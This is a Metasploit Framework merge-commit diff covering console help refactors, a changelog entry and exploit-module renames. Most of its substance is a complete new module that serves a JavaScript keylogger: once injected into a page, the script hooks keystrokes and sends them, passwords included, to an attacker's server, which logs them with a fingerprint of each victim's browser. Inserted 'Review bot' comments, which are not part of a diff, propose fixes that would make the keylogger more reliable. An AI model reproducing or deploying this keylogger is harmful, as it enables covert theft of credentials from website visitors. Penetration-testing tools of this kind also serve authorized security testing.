Merge branch 'master' of github.com:rapid7/metasploit-framework
commit
a288742376
|
@ -1,6 +1,14 @@
|
|||
Armitage Changelog
|
||||
==================
|
||||
|
||||
21 Feb 12
|
||||
---------
|
||||
- Added Cut/Copy/Paste menu to table cell editor.
|
||||
- Module browser search field now treats spaces as a wildcard. You may type:
|
||||
"win meterp" and Armitage will treat it as "win*meterp"
|
||||
- Hovering over an edge in graph view no longer reports a "null" tooltip
|
||||
- Fixed parsing of ps output for the process dialog (it's much much better now)
|
||||
|
||||
14 Feb 12
|
||||
---------
|
||||
- Added ports 5631 (pc anywhere) and 902 (vmauthd) to the MSF Scans feature.
|
||||
|
|
|
@ -28,7 +28,6 @@ class Db
|
|||
#
|
||||
def commands
|
||||
base = {
|
||||
"db_driver" => "Specify a database driver",
|
||||
"db_connect" => "Connect to an existing database",
|
||||
"db_disconnect" => "Disconnect from the current database instance",
|
||||
"db_status" => "Show the current database status",
|
||||
|
@ -1262,44 +1261,6 @@ class Db
|
|||
end
|
||||
end
|
||||
|
||||
def cmd_db_driver(*args)
|
||||
|
||||
if(args[0])
|
||||
if(args[0] == "-h" || args[0] == "--help")
|
||||
print_status("Usage: db_driver [driver-name]")
|
||||
return
|
||||
end
|
||||
|
||||
if(framework.db.drivers.include?(args[0]))
|
||||
framework.db.driver = args[0]
|
||||
print_status("Using database driver #{args[0]}")
|
||||
else
|
||||
print_error("Invalid driver specified")
|
||||
end
|
||||
return
|
||||
end
|
||||
|
||||
if(framework.db.driver)
|
||||
print_status(" Active Driver: #{framework.db.driver}")
|
||||
else
|
||||
print_status("No Active Driver")
|
||||
end
|
||||
print_status(" Available: #{framework.db.drivers.join(", ")}")
|
||||
print_line("")
|
||||
|
||||
if ! framework.db.drivers.include?('postgresql')
|
||||
print_status(" DB Support: Enable the postgresql driver with the following command:")
|
||||
print_status(" * This requires libpq-dev and a build environment")
|
||||
print_status(" $ gem install postgres")
|
||||
print_status(" $ gem install pg # is an alternative that may work")
|
||||
print_line("")
|
||||
end
|
||||
end
|
||||
|
||||
def cmd_db_driver_tabs(str, words)
|
||||
return framework.db.drivers
|
||||
end
|
||||
|
||||
def cmd_db_connect_help
|
||||
# Help is specific to each driver
|
||||
cmd_db_connect("-h")
|
||||
|
|
|
@ -109,7 +109,7 @@ class Console::CommandDispatcher::Core
|
|||
# Performs operations on the supplied channel.
|
||||
#
|
||||
def cmd_channel(*args)
|
||||
if args.include?("-h") or args.include?("--help")
|
||||
if args.empty? or args.include?("-h") or args.include?("--help")
|
||||
cmd_channel_help
|
||||
return
|
||||
end
|
||||
|
@ -180,14 +180,35 @@ class Console::CommandDispatcher::Core
|
|||
end
|
||||
end
|
||||
|
||||
def cmd_channel_tabs(str, words)
|
||||
case words.length
|
||||
when 1
|
||||
@@channel_opts.fmt.keys
|
||||
when 2
|
||||
case words[1]
|
||||
when "-c", "-i", "-r", "-w"
|
||||
tab_complete_channels
|
||||
else
|
||||
[]
|
||||
end
|
||||
else
|
||||
[]
|
||||
end
|
||||
end
|
||||
|
||||
def cmd_close_help
|
||||
print_line "Usage: close <channel_id>"
|
||||
print_line
|
||||
print_line "Closes the supplied channel."
|
||||
print_line
|
||||
end
|
||||
|
||||
#
|
||||
# Closes a supplied channel.
|
||||
#
|
||||
def cmd_close(*args)
|
||||
if (args.length == 0)
|
||||
print_line(
|
||||
"Usage: close channel_id\n\n" +
|
||||
"Closes the supplied channel.")
|
||||
cmd_close_help
|
||||
return true
|
||||
end
|
||||
|
||||
|
@ -204,6 +225,12 @@ class Console::CommandDispatcher::Core
|
|||
end
|
||||
end
|
||||
|
||||
def cmd_close_tabs(str, words)
|
||||
return [] if words.length > 1
|
||||
|
||||
return tab_complete_channels
|
||||
end
|
||||
|
||||
#
|
||||
# Terminates the meterpreter session.
|
||||
#
|
||||
|
@ -216,6 +243,17 @@ class Console::CommandDispatcher::Core
|
|||
|
||||
alias cmd_quit cmd_exit
|
||||
|
||||
def cmd_detach_help
|
||||
print_line "Detach from the victim. Only possible for non-stream sessions (http/https)"
|
||||
print_line
|
||||
print_line "The victim will continue to attempt to call back to the handler until it"
|
||||
print_line "successfully connects (which may happen immediately if you have a handler"
|
||||
print_line "running in the background), or reaches its expiration."
|
||||
print_line
|
||||
print_line "This session may #{client.passive_service ? "" : "NOT"} be detached."
|
||||
print_line
|
||||
end
|
||||
|
||||
#
|
||||
# Disconnects the session
|
||||
#
|
||||
|
@ -228,14 +266,19 @@ class Console::CommandDispatcher::Core
|
|||
shell.stop
|
||||
end
|
||||
|
||||
def cmd_interact_help
|
||||
print_line "Usage: interact <channel_id>"
|
||||
print_line
|
||||
print_line "Interacts with the supplied channel."
|
||||
print_line
|
||||
end
|
||||
|
||||
#
|
||||
# Interacts with a channel.
|
||||
#
|
||||
def cmd_interact(*args)
|
||||
if (args.length == 0)
|
||||
print_line(
|
||||
"Usage: interact channel_id\n\n" +
|
||||
"Interacts with the supplied channel.")
|
||||
cmd_info_help
|
||||
return true
|
||||
end
|
||||
|
||||
|
@ -251,6 +294,8 @@ class Console::CommandDispatcher::Core
|
|||
end
|
||||
end
|
||||
|
||||
alias cmd_interact_tabs cmd_close_tabs
|
||||
|
||||
#
|
||||
# Runs the IRB scripting shell
|
||||
#
|
||||
|
@ -261,15 +306,20 @@ class Console::CommandDispatcher::Core
|
|||
Rex::Ui::Text::IrbShell.new(binding).run
|
||||
end
|
||||
|
||||
def cmd_migrate_help
|
||||
print_line "Usage: migrate <pid>"
|
||||
print_line
|
||||
print_line "Migrates the server instance to another process."
|
||||
print_line "NOTE: Any open channels or other dynamic state will be lost."
|
||||
print_line
|
||||
end
|
||||
|
||||
#
|
||||
# Migrates the server to the supplied process identifier.
|
||||
#
|
||||
def cmd_migrate(*args)
|
||||
if (args.length == 0)
|
||||
print_line(
|
||||
"Usage: migrate pid\n\n" +
|
||||
"Migrates the server instance to another process.\n" +
|
||||
"Note: Any open channels or other dynamic state will be lost.")
|
||||
cmd_migrate_help
|
||||
return true
|
||||
end
|
||||
|
||||
|
@ -371,14 +421,19 @@ class Console::CommandDispatcher::Core
|
|||
alias cmd_use_help cmd_load_help
|
||||
alias cmd_use_tabs cmd_load_tabs
|
||||
|
||||
def cmd_read_help
|
||||
print_line "Usage: read <channel_id> [length]"
|
||||
print_line
|
||||
print_line "Reads data from the supplied channel."
|
||||
print_line
|
||||
end
|
||||
|
||||
#
|
||||
# Reads data from a channel.
|
||||
#
|
||||
def cmd_read(*args)
|
||||
if (args.length == 0)
|
||||
print_line(
|
||||
"Usage: read channel_id [length]\n\n" +
|
||||
"Reads data from the supplied channel.")
|
||||
cmd_read_help
|
||||
return true
|
||||
end
|
||||
|
||||
|
@ -402,6 +457,8 @@ class Console::CommandDispatcher::Core
|
|||
return true
|
||||
end
|
||||
|
||||
alias cmd_read_tabs cmd_close_tabs
|
||||
|
||||
def cmd_run_help
|
||||
print_line "Usage: run <script> [arguments]"
|
||||
print_line
|
||||
|
@ -669,17 +726,15 @@ class Console::CommandDispatcher::Core
|
|||
return true
|
||||
end
|
||||
|
||||
def cmd_resource_tabs(str, words)
|
||||
return [] if words.length > 1
|
||||
|
||||
tab_complete_filenames(str, words)
|
||||
def cmd_resource_help
|
||||
print_line "Usage: resource <path1> [path2 ...]"
|
||||
print_line
|
||||
print_line "Run the commands stored in the supplied files."
|
||||
print_line
|
||||
end
|
||||
|
||||
def cmd_resource(*args)
|
||||
if args.empty?
|
||||
print(
|
||||
"Usage: resource path1 path2" +
|
||||
"Run the commands stored in the supplied files.\n")
|
||||
return false
|
||||
end
|
||||
args.each do |glob|
|
||||
|
@ -710,6 +765,12 @@ class Console::CommandDispatcher::Core
|
|||
end
|
||||
end
|
||||
|
||||
def cmd_resource_tabs(str, words)
|
||||
return [] if words.length > 1
|
||||
|
||||
tab_complete_filenames(str, words)
|
||||
end
|
||||
|
||||
def cmd_enable_unicode_encoding
|
||||
client.encode_unicode = true
|
||||
print_status("Unicode encoding is enabled")
|
||||
|
@ -799,6 +860,10 @@ protected
|
|||
tabs.compact
|
||||
end
|
||||
|
||||
def tab_complete_channels
|
||||
client.channels.keys.map { |k| k.to_s }
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
end
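Review bot: `cmd_interact` calls `cmd_info_help` when invoked with no arguments, not the `cmd_interact_help` this commit defines a few lines above it, so `interact` on its own prints another command's help (assuming a `cmd_info_help` exists elsewhere in this dispatcher) instead of `Usage: interact <channel_id>`; the call should read `cmd_interact_help`. `cmd_resource` is the one command in this file left on the old pattern: it still prints a hand-built usage string, and `"Usage: resource path1 path2" + "Run the commands stored in the supplied files.\n"` has no newline between the two pieces, so they run together on one line; replacing the `print(...)` with `cmd_resource_help` fixes the text and matches `cmd_close`, `cmd_read` and `cmd_migrate`. The bodies of `cmd_interact` and `cmd_resource` continue past their hunks.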
|
||||
|
|
|
@ -0,0 +1,311 @@
|
|||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Capture: HTTP JavaScript Keylogger',
|
||||
'Description' => %q{
|
||||
This modules runs a web server that demonstrates keystroke
|
||||
logging through JavaScript. The DEMO option can be set to enable
|
||||
a page that demonstrates this technique. Future improvements will
|
||||
allow for a configurable template to be used with this module.
|
||||
To use this module with an existing web page, simply add a
|
||||
script source tag pointing to the URL of this service ending
|
||||
in the .js extension. For example, if URIPATH is set to "test",
|
||||
the following URL will load this script into the calling site.
|
||||
http://server:port/test/anything.js
|
||||
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => ['Marcus J. Carey <mjc[at]threatagent.com>', 'hdm'],
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptBool.new('DEMO', [true, "Creates HTML for demo purposes", false]),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
|
||||
# This is the module's main runtime method
|
||||
def run
|
||||
@seed = Rex::Text.rand_text_alpha(12)
|
||||
@client_cache = {}
|
||||
|
||||
# Starts Web Server
|
||||
exploit
|
||||
end
|
||||
|
||||
# This handles the HTTP responses for the Web server
|
||||
def on_request_uri(cli, request)
|
||||
|
||||
cid = nil
|
||||
|
||||
if request['Cookie'].to_s =~ /,?\s*id=([a-f0-9]{4,32})/i
|
||||
cid = $1
|
||||
end
|
||||
|
||||
if not cid and request.qstring['id'].to_s =~ /^([a-f0-9]{4,32})/i
|
||||
cid = $1
|
||||
end
|
||||
|
||||
data = request.qstring['data']
|
||||
|
||||
unless cid
|
||||
cid = generate_client_id(cli,request)
|
||||
print_status("#{cli.peerhost} Assigning client identifier '#{cid}'")
|
||||
|
||||
resp = create_response(302, 'Moved')
|
||||
resp['Content-Type'] = 'text/html'
|
||||
resp['Location'] = request.uri + '?id=' + cid
|
||||
resp['Set-Cookie'] = "id=#{cid}"
|
||||
cli.send_response(resp)
|
||||
return
|
||||
end
|
||||
|
||||
base_url = generate_base_url(cli, request)
|
||||
|
||||
# print_status("#{cli.peerhost} [#{cid}] Incoming #{request.method} request for #{request.uri}")
|
||||
|
||||
case request.uri
|
||||
when /\.js(\?|$)/
|
||||
content_type = "text/plain"
|
||||
send_response(cli, generate_keylogger_js(base_url, cid), {'Content-Type'=> content_type, 'Set-Cookie' => "id=#{cid}"})
|
||||
|
||||
when /\/demo\/?(\?|$)/
|
||||
if datastore['DEMO']
|
||||
content_type = "text/html"
|
||||
send_response(cli, generate_demo(base_url, cid), {'Content-Type'=> content_type, 'Set-Cookie' => "id=#{cid}"})
|
||||
else
|
||||
send_not_found(cli)
|
||||
end
|
||||
|
||||
else
|
||||
if data
|
||||
nice = process_data(cli, request, cid, data)
|
||||
script = datastore['DEMO'] ? generate_demo_js_reply(base_url, cid, nice) : ""
|
||||
send_response(cli, script, {'Content-Type' => "text/plain", 'Set-Cookie' => "id=#{cid}"})
|
||||
else
|
||||
if datastore['DEMO']
|
||||
send_redirect(cli, "/demo/?cid=#{cid}")
|
||||
else
|
||||
send_not_found(cli)
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
# Figure out what our base URL is based on the user submitted
|
||||
# Host header or the address of the client.
|
||||
def generate_base_url(cli, req)
|
||||
port = nil
|
||||
host = Rex::Socket.source_address(cli.peerhost)
|
||||
|
||||
if req['Host']
|
||||
host = req['Host']
|
||||
bits = host.split(':')
|
||||
|
||||
# Extract the hostname:port sequence from the Host header
|
||||
if bits.length > 1 and bits.last.to_i > 0
|
||||
port = bits.pop.to_i
|
||||
host = bits.join(':')
|
||||
end
|
||||
else
|
||||
port = datastore['SRVPORT'].to_i
|
||||
end
|
||||
|
||||
prot = (!! datastore['SSL']) ? 'https://' : 'http://'
|
||||
if Rex::Socket.is_ipv6?(host)
|
||||
host = "[#{host}]"
|
||||
end
|
||||
|
||||
base = prot + host
|
||||
if not ((prot == 'https' and port.nil?) or (prot == 'http' and port.nil?))
|
||||
base << ":#{port}"
|
||||
end
|
||||
|
||||
base << get_resource
|
||||
end
|
||||
|
||||
def process_data(cli, request, cid, data)
|
||||
|
||||
lines = [""]
|
||||
real = ""
|
||||
|
||||
Rex::Text.uri_decode(data).split(",").each do |char|
|
||||
byte = char.to_s.hex.chr
|
||||
next if byte == "\x00"
|
||||
real << byte
|
||||
case char.to_i
|
||||
# Do Backspace
|
||||
when 8
|
||||
lines[-1] = lines[-1][0, lines[-1].length - 1] if lines[-1].length > 0
|
||||
when 13
|
||||
lines << ""
|
||||
else
|
||||
lines[-1] << byte
|
||||
end
|
||||
end
|
||||
|
||||
nice = lines.join("<CR>").gsub("\t", "<TAB>")
|
||||
real = real.gsub("\x08", "<DEL>")
|
||||
|
||||
if not @client_cache[cid]
|
||||
|
||||
fp = fingerprint_user_agent(request['User-Agent'] || "")
|
||||
header = "Browser Keystroke Log\n"
|
||||
header << "=====================\n"
|
||||
header << "Created: #{Time.now.to_s}\n"
|
||||
header << "Address: #{cli.peerhost}\n"
|
||||
header << " ID: #{cid}\n"
|
||||
header << " FPrint: #{fp.inspect}\n"
|
||||
header << " URL: #{request.uri}\n"
|
||||
header << "\n"
|
||||
header << "====================\n\n"
|
||||
|
||||
@client_cache[cid] = {
|
||||
:created => Time.now.to_i,
|
||||
:path_clean => store_loot("browser.keystrokes.clean", "text/plain", cli.peerhost, header, "keystrokes_clean_#{cid}.txt", "Browser Keystroke Logs (Clean)"),
|
||||
:path_raw => store_loot("browser.keystrokes.raw", "text/plain", cli.peerhost, header, "keystrokes_clean_#{cid}.txt", "Browser Keystroke Logs (Raw)")
|
||||
}
|
||||
print_good("#{cli.peerhost} [#{cid}] Logging clean keystrokes to: #{@client_cache[cid][:path_clean]}")
|
||||
print_good("#{cli.peerhost} [#{cid}] Logging raw keystrokes to: #{@client_cache[cid][:path_raw]}")
|
||||
end
|
||||
|
||||
::File.open( @client_cache[cid][:path_clean], "a") { |fd| fd.puts nice }
|
||||
::File.open( @client_cache[cid][:path_raw], "a") { |fd| fd.write(real) }
|
||||
|
||||
if nice.length > 0
|
||||
print_good("#{cli.peerhost} [#{cid}] Keys: #{nice}")
|
||||
end
|
||||
|
||||
nice
|
||||
end
|
||||
|
||||
def generate_client_id(cli, req)
|
||||
"%.8x" % Kernel.rand(0x100000000)
|
||||
end
|
||||
|
||||
|
||||
def generate_demo(base_url, cid)
|
||||
# This is the Demo Form Page <HTML>
|
||||
html = <<EOS
|
||||
<html>
|
||||
<head>
|
||||
<title>Demo Form</title>
|
||||
<script type="text/javascript" src="#{base_url}/#{@seed}.js?id=#{cid}"></script>
|
||||
</head>
|
||||
<body bgcolor="white">
|
||||
<br><br>
|
||||
<div align="center">
|
||||
<h1>Keylogger Demo Form</h1>
|
||||
<form method=\"POST\" name=\"logonf\" action=\"#{base_url}/demo/?id=#{cid}\">
|
||||
<p><font color="red"><i>This form submits data to the Metasploit listener for demonstration purposes.</i></font>
|
||||
<br><br>
|
||||
<table border="0" cellspacing="0" cellpadding="0">
|
||||
<tr><td>Username:</td> <td><input name="username" size="20"></td> </tr>
|
||||
<tr><td>Password:</td> <td><input type="password" name="password" size="20"></td> </tr>
|
||||
</table>
|
||||
<p align="center"><input type="submit" value="Submit"></p></form>
|
||||
|
||||
<br/>
|
||||
<textarea cols="80" rows="5" id="results">
|
||||
</textarea>
|
||||
|
||||
</div>
|
||||
</body>
|
||||
</html>
|
||||
EOS
|
||||
return html
|
||||
end
|
||||
|
||||
# This is the JavaScript Key Logger Code
|
||||
def generate_keylogger_js(base_url, cid)
|
||||
|
||||
targ = Rex::Text.rand_text_alpha(12)
|
||||
|
||||
code = <<EOS
|
||||
|
||||
var c#{@seed} = 0;
|
||||
window.onload = function load#{@seed}(){
|
||||
l#{@seed} = ",";
|
||||
|
||||
if (window.addEventListener) {
|
||||
document.addEventListener('keypress', p#{@seed}, true);
|
||||
document.addEventListener('keydown', d#{@seed}, true);
|
||||
} else if (window.attachEvent) {
|
||||
document.attachEvent('onkeypress', p#{@seed});
|
||||
document.attachEvent('onkeydown', d#{@seed});
|
||||
} else {
|
||||
document.onkeypress = p#{@seed};
|
||||
document.onkeydown = d#{@seed};
|
||||
}
|
||||
|
||||
}
|
||||
function p#{@seed}(e){
|
||||
k#{@seed} = (window.event) ? window.event.keyCode : e.which;
|
||||
k#{@seed} = k#{@seed}.toString(16);
|
||||
if (k#{@seed} != "d"){
|
||||
#{@seed}(k#{@seed});
|
||||
}
|
||||
}
|
||||
function d#{@seed}(e){
|
||||
k#{@seed} = (window.event) ? window.event.keyCode : e.which;
|
||||
if (k#{@seed} == 9 || k#{@seed} == 8 || k#{@seed} == 13){
|
||||
#{@seed}(k#{@seed});
|
||||
}
|
||||
}
|
||||
|
||||
function #{@seed}(k#{@seed}){
|
||||
l#{@seed} = l#{@seed} + k#{@seed} + ",";
|
||||
|
||||
var t#{@seed} = "#{targ}" + c#{@seed};
|
||||
c#{@seed}++;
|
||||
|
||||
var f#{@seed};
|
||||
|
||||
if (document.all)
|
||||
f#{@seed} = document.createElement("<script name='" + t#{@seed} + "' id='" + t#{@seed} + "'></script>");
|
||||
else {
|
||||
f#{@seed} = document.createElement("script");
|
||||
f#{@seed}.setAttribute("id", t#{@seed});
|
||||
f#{@seed}.setAttribute("name", t#{@seed});
|
||||
}
|
||||
|
||||
f#{@seed}.setAttribute("src", "#{base_url}?id=#{cid}&data=" + l#{@seed});
|
||||
f#{@seed}.style.visibility = "hidden";
|
||||
|
||||
document.body.appendChild(f#{@seed});
|
||||
|
||||
if (k#{@seed} == 13 || l#{@seed}.length > 3000)
|
||||
l#{@seed} = ",";
|
||||
|
||||
setTimeout('document.body.removeChild(document.getElementById("' + t#{@seed} + '"))', 5000);
|
||||
}
|
||||
EOS
|
||||
return code
|
||||
end
|
||||
|
||||
def generate_demo_js_reply(base_url, cid, data)
|
||||
code = <<EOS
|
||||
try {
|
||||
document.getElementById("results").value = "Keystrokes: #{data}";
|
||||
} catch(e) { }
|
||||
EOS
|
||||
return code
|
||||
end
|
||||
|
||||
|
||||
|
||||
end
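Review bot: `process_data` turns each comma-separated token into a byte with `char.to_s.hex.chr`, and `Integer#chr` raises RangeError for any value above 255, so a client (the victim's browser sends `e.which`, which can exceed 255 for non-ASCII keypresses, or anyone who requests `?id=abcd&data=ffff`) raises inside the request handler; guard it with `code = char.to_s.hex` / `next unless code.between?(1, 255)` / `byte = code.chr`. The script also mixes encodings — `p…` sends `keyCode.toString(16)` while `d…` sends the decimal keyCode for 8, 9 and 13 — and `process_data` dispatches on `char.to_i` but writes `char.hex.chr` to the raw log, so Enter arrives as `"13"`, is treated as a newline for the clean log, and is stored as 0x13 rather than 0x0d in the raw one. In `generate_base_url`, `prot` is `'http://'` or `'https://'` but is compared against `'https'` and `'http'`, so the guard is always true and a Host header without a port yields `http://host:/…`; `base << ":#{port}" if port` is the intended check, and the second `store_loot` call should name its file `keystrokes_raw_#{cid}.txt` rather than reusing `keystrokes_clean_#{cid}.txt`. Finally, `nice` is victim-controlled and is interpolated unescaped into the demo reply (`"Keystrokes: #{data}"`, where a `"` or `\` breaks or injects into the script) and into `print_good`, where control bytes other than NUL and tab reach the operator's terminal; escape it for a JS string literal before the first use (hex-escaping non-alphanumerics, e.g. with `Rex::Text.to_hex`) and strip non-printables, e.g. `nice.gsub(/[^[:print:]]/, '.')`, before the second.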
|
||||
|
|
@ -14,7 +14,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => 'PmWiki <= 2.2.34 (pagelist) Remote PHP Code Execution',
|
||||
'Name' => 'PmWiki <= 2.2.34 pagelist.php Remote PHP Code Injection Exploit',
|
||||
'Description' => %q{
|
||||
This module exploits an arbitrary command execution vulnerability
|
||||
in PmWiki from 2.0.0 to 2.2.34. The vulnerable function is
|
||||
|
|
|
@ -14,7 +14,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'vBSEO <= 3.6.0 "proc_deutf()" Remote PHP Code Injection',
|
||||
'Name' => 'vBSEO <= 3.6.0 proc_deutf() Remote PHP Code Injection',
|
||||
'Description' => %q{
|
||||
This module exploits a vulnerability in the 'proc_deutf()' function
|
||||
defined in /includes/functions_vbseocp_abstract.php. User input passed through
|
||||
|
|
|
@ -24,14 +24,14 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Mozilla Firefox 3.6.16 mChannel use after free vulnerability',
|
||||
'Name' => 'Mozilla Firefox 3.6.16 mChannel Use-After-Free',
|
||||
'Description' => %q{
|
||||
This module exploits a use-after-free vulnerability in Mozilla
|
||||
Firefox 3.6.16. An OBJECT Element mChannel can be freed via the
|
||||
Firefox 3.6.16. An OBJECT element, mChannel, can be freed via the
|
||||
OnChannelRedirect method of the nsIChannelEventSink Interface. mChannel
|
||||
becomes a dangling pointer and can be reused when setting the OBJECTs
|
||||
data attribute. (Discovered by regenrecht). Mac OS X version by argp,
|
||||
tested on Mac OS X 10.6.6, 10.6.7, 10.6.8, 10.7.2 and 10.7.3.
|
||||
data attribute. This module has been tested on Mac OS X 10.6.6, 10.6.7,
|
||||
10.6.8, 10.7.2 and 10.7.3.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
|
|
|
@ -14,7 +14,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'CCMPlayer 1.5 Stack based Buffer Overflow (.m3u)',
|
||||
'Name' => 'CCMPlayer 1.5 m3u Playlist Stack Based Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a stack based buffer overflow in CCMPlayer 1.5. Opening
|
||||
a m3u playlist with a long track name, a SEH exception record can be overwritten
|
||||
|
|
|
@ -15,7 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Free MP3 CD Ripper 1.1 (WAV File) Stack Buffer Overflow',
|
||||
'Name' => 'Free MP3 CD Ripper 1.1 WAV File Stack Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a stack based buffer overflow found in Free MP3 CD
|
||||
Ripper 1.1. The overflow is triggered when an unsuspecting user opens a malicious
|
||||
|
|
|
@ -14,7 +14,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Mini-Stream RM-MP3 Converter v3.1.2.1 (PLS File) Stack Buffer Overflow',
|
||||
'Name' => 'Mini-Stream RM-MP3 Converter v3.1.2.1 PLS File Stack Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a stack based buffer overflow found in Mini-Stream RM-MP3
|
||||
Converter v3.1.2.1. The overflow is triggered when an unsuspecting victim
|
||||
|
|
|
@ -14,7 +14,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'AbsoluteFTP 1.9.6 - 2.2.10 Remote Buffer Overflow (LIST)',
|
||||
'Name' => 'AbsoluteFTP 1.9.6 - 2.2.10 LIST Command Remote Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits VanDyke Software AbsoluteFTP by overflowing
|
||||
a filename buffer related to the LIST command.
|
||||
|
|
|
@ -19,7 +19,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Serv-U FTP Server <4.2 Buffer Overflow',
|
||||
'Name' => 'Serv-U FTP Server < 4.2 Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a stack buffer overflow in the site chmod command
|
||||
in versions of Serv-U FTP Server prior to 4.2.
|
||||
|
|
|
@ -14,7 +14,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'StreamDown 6.8.0 Buffer overflow',
|
||||
'Name' => 'StreamDown 6.8.0 Buffer Overflow',
|
||||
'Description' => %q{
|
||||
Stream Down 6.8.0 seh based buffer overflow triggered when processing
|
||||
the server reponse packet.During the overflow a structured exception
|
||||
|
|
|
@ -15,7 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => "Wireshark console.lua pre-loading vulnerability",
|
||||
'Name' => "Wireshark console.lua Pre-Loading Script Execution",
|
||||
'Description' => %q{
|
||||
This modules exploits a vulnerability in Wireshark 1.6 or less. When opening a
|
||||
pcap file, Wireshark will actually check if there's a 'console.lua' file in the same
|
||||
|
@ -335,4 +335,4 @@ But on a fully patched XP SP3, the same URI format will not work. Windows will t
|
|||
the share via SMB, and the victim will not see the share. In this case, you should specify
|
||||
the URI to like this:
|
||||
http://192.168.1.11/files
|
||||
=end
|
||||
=end
|
||||
|
|
|
@ -16,7 +16,7 @@ class Metasploit3 < Msf::Post
|
|||
|
||||
def initialize(info={})
|
||||
super( update_info( info,
|
||||
'Name' => 'Windows Gather RazorSQL credentials',
|
||||
'Name' => 'Windows Gather RazorSQL Credentials',
|
||||
'Description' => %q{
|
||||
This module stores username, password, type, host, port, database (and name)
|
||||
collected from profiles.txt of RazorSQL.
|
||||
|
@ -154,4 +154,4 @@ end
|
|||
=begin
|
||||
http://www.razorsql.com/download.html
|
||||
Tested on: v5.6.2 (win32)
|
||||
=end
|
||||
=end
|
||||
|
|
|
@ -17,7 +17,7 @@ class Metasploit3 < Msf::Post
|
|||
|
||||
def initialize(info={})
|
||||
super( update_info( info,
|
||||
'Name' => 'Windows Disconnect Wireless Connection ',
|
||||
'Name' => 'Windows Disconnect Wireless Connection',
|
||||
'Description' => %q{
|
||||
This module disconnects the current wireless network connection
|
||||
on the specified interface.
|
||||
|
|